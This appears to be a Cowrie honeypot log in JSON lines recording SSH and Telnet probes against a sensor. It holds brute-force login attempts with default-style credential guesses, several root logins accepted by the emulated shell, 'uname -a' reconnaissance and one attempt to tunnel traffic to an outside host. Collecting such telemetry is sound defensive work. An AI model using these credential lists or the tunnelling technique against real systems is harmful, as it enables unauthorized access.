{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45172,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26ba554a028","protocol":"ssh","message":"New connection: 212.227.235.229:45172 (1.2.3.4:22) [session: c26ba554a028]","sensor":"my-vps","timestamp":"2025-08-28T04:57:22.388417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.9.2","message":"Remote SSH version: SSH-2.0-paramiko_2.9.2","sensor":"my-vps","timestamp":"2025-08-28T04:57:22.389338Z","src_ip":"212.227.235.229","session":"c26ba554a028"}
{"eventid":"cowrie.client.kex","hassh":"d6729b7f24428169e981ad4840063ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: d6729b7f24428169e981ad4840063ca5","sensor":"my-vps","timestamp":"2025-08-28T04:57:22.549474Z","src_ip":"212.227.235.229","session":"c26ba554a028"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:57:23.391312Z","src_ip":"212.227.235.229","session":"c26ba554a028"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:57:36.711623Z","src_ip":"212.227.235.229","session":"dcbbd57b5079"}
{"eventid":"cowrie.session.closed","duration":180.27661395072937,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:57:36.716922Z","src_ip":"212.227.235.229","session":"dcbbd57b5079"}
{"eventid":"cowrie.session.connect","src_ip":"89.138.138.37","src_port":55769,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a31a9489272","protocol":"telnet","message":"New connection: 89.138.138.37:55769 (1.2.3.4:23) [session: 2a31a9489272]","sensor":"my-vps","timestamp":"2025-08-28T04:59:01.276564Z"}
{"eventid":"cowrie.session.connect","src_ip":"47.237.117.186","src_port":50066,"dst_ip":"1.2.3.4","dst_port":23,"session":"8620301d8dc5","protocol":"telnet","message":"New connection: 47.237.117.186:50066 (1.2.3.4:23) [session: 8620301d8dc5]","sensor":"my-vps","timestamp":"2025-08-28T04:59:05.439498Z"}
{"eventid":"cowrie.session.closed","duration":12.862366437911987,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:59:14.138859Z","src_ip":"89.138.138.37","session":"2a31a9489272"}
{"eventid":"cowrie.session.closed","duration":30.666434288024902,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:59:36.105865Z","src_ip":"47.237.117.186","session":"8620301d8dc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47926,"dst_ip":"1.2.3.4","dst_port":23,"session":"c14768410b75","protocol":"telnet","message":"New connection: 212.227.125.160:47926 (1.2.3.4:23) [session: c14768410b75]","sensor":"my-vps","timestamp":"2025-08-28T05:01:26.040549Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62714,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ab0184bc076","protocol":"ssh","message":"New connection: 217.72.205.35:62714 (1.2.3.4:22) [session: 0ab0184bc076]","sensor":"my-vps","timestamp":"2025-08-28T05:01:42.260437Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:01:42.261503Z","src_ip":"217.72.205.35","session":"0ab0184bc076"}
{"eventid":"cowrie.session.closed","duration":30.45256757736206,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:01:56.493046Z","src_ip":"212.227.125.160","session":"c14768410b75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50224,"dst_ip":"1.2.3.4","dst_port":22,"session":"01abf206862d","protocol":"ssh","message":"New connection: 212.227.235.229:50224 (1.2.3.4:22) [session: 01abf206862d]","sensor":"my-vps","timestamp":"2025-08-28T05:02:44.777285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:02:44.778427Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:02:44.857324Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.login.success","username":"root","password":"0da0ee7cd68d3d6dab82c32c27039984","message":"login attempt [root/0da0ee7cd68d3d6dab82c32c27039984] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:02:45.097196Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:02:45.320128Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T05:02:45.320805Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:02:45.461383Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:02:45.462400Z","src_ip":"212.227.235.229","session":"01abf206862d"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":10637,"dst_ip":"1.2.3.4","dst_port":22,"session":"097c04bfb258","protocol":"ssh","message":"New connection: 80.94.95.15:10637 (1.2.3.4:22) [session: 097c04bfb258]","sensor":"my-vps","timestamp":"2025-08-28T05:04:49.595585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:04:49.596524Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:04:49.647490Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.login.failed","username":"david","password":"david","message":"login attempt [david/david] failed","sensor":"my-vps","timestamp":"2025-08-28T05:04:49.950371Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc123","message":"login attempt [david/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:04:51.007267Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd123","message":"login attempt [david/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:04:52.061693Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.login.failed","username":"david","password":"abcd1234","message":"login attempt [david/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:04:53.114703Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.login.failed","username":"david","password":"abc1234","message":"login attempt [david/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:04:54.491480Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:04:55.545449Z","src_ip":"80.94.95.15","session":"097c04bfb258"}
{"eventid":"cowrie.session.connect","src_ip":"14.48.125.61","src_port":56257,"dst_ip":"1.2.3.4","dst_port":23,"session":"4bb24d281981","protocol":"telnet","message":"New connection: 14.48.125.61:56257 (1.2.3.4:23) [session: 4bb24d281981]","sensor":"my-vps","timestamp":"2025-08-28T05:05:19.793594Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63246,"dst_ip":"1.2.3.4","dst_port":22,"session":"108424e85d33","protocol":"ssh","message":"New connection: 212.227.235.229:63246 (1.2.3.4:22) [session: 108424e85d33]","sensor":"my-vps","timestamp":"2025-08-28T05:05:33.643507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:05:33.644139Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:05:33.814160Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.login.failed","username":"user","password":"mandy","message":"login attempt [user/mandy] failed","sensor":"my-vps","timestamp":"2025-08-28T05:05:34.549078Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.login.failed","username":"user","password":"labrador","message":"login attempt [user/labrador] failed","sensor":"my-vps","timestamp":"2025-08-28T05:05:35.724524Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.login.failed","username":"user","password":"kisses","message":"login attempt [user/kisses] failed","sensor":"my-vps","timestamp":"2025-08-28T05:05:36.903090Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.login.failed","username":"user","password":"katrin","message":"login attempt [user/katrin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:05:38.497910Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.login.failed","username":"user","password":"kasper","message":"login attempt [user/kasper] failed","sensor":"my-vps","timestamp":"2025-08-28T05:05:39.664385Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:05:40.830719Z","src_ip":"212.227.235.229","session":"108424e85d33"}
{"eventid":"cowrie.session.closed","duration":30.53633141517639,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:05:50.329852Z","src_ip":"14.48.125.61","session":"4bb24d281981"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60176,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5d228e46b1f","protocol":"ssh","message":"New connection: 217.72.205.35:60176 (1.2.3.4:22) [session: f5d228e46b1f]","sensor":"my-vps","timestamp":"2025-08-28T05:08:20.745724Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:08:20.746863Z","src_ip":"217.72.205.35","session":"f5d228e46b1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6162,"dst_ip":"1.2.3.4","dst_port":22,"session":"2345ededd952","protocol":"ssh","message":"New connection: 212.227.235.229:6162 (1.2.3.4:22) [session: 2345ededd952]","sensor":"my-vps","timestamp":"2025-08-28T05:11:00.918083Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:11:00.920935Z","src_ip":"212.227.235.229","session":"2345ededd952"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6506,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e40524406f","protocol":"ssh","message":"New connection: 212.227.235.229:6506 (1.2.3.4:22) [session: 04e40524406f]","sensor":"my-vps","timestamp":"2025-08-28T05:11:01.038402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:11:01.039464Z","src_ip":"212.227.235.229","session":"04e40524406f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T05:11:01.178159Z","src_ip":"212.227.235.229","session":"04e40524406f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:11:01.596807Z","src_ip":"212.227.235.229","session":"04e40524406f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T05:11:01.736976Z","session":"04e40524406f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:12:11.039315Z","src_ip":"212.227.235.229","session":"04e40524406f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":31567,"dst_ip":"1.2.3.4","dst_port":22,"session":"4693c0239dea","protocol":"ssh","message":"New connection: 212.227.125.160:31567 (1.2.3.4:22) [session: 4693c0239dea]","sensor":"my-vps","timestamp":"2025-08-28T05:12:27.045536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:12:27.046284Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:12:27.126649Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin.123","message":"login attempt [admin/admin.123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:12:27.526237Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-28T05:12:28.610057Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ubnt","message":"login attempt [admin/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T05:12:29.692487Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"adminadmin","message":"login attempt [admin/adminadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T05:12:30.775294Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T05:12:31.894115Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:12:32.977828Z","src_ip":"212.227.125.160","session":"4693c0239dea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2655,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a2c00f285ef","protocol":"ssh","message":"New connection: 212.227.235.229:2655 (1.2.3.4:22) [session: 5a2c00f285ef]","sensor":"my-vps","timestamp":"2025-08-28T05:13:02.204831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:13:02.800388Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:13:02.801189Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.login.success","username":"root","password":"0890105521","message":"login attempt [root/0890105521] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:13:05.589328Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:13:07.013728Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T05:13:07.014466Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:13:07.886501Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:13:08.430490Z","src_ip":"212.227.235.229","session":"5a2c00f285ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56504,"dst_ip":"1.2.3.4","dst_port":22,"session":"93f56ff44b26","protocol":"ssh","message":"New connection: 212.227.125.160:56504 (1.2.3.4:22) [session: 93f56ff44b26]","sensor":"my-vps","timestamp":"2025-08-28T05:14:30.905409Z"}
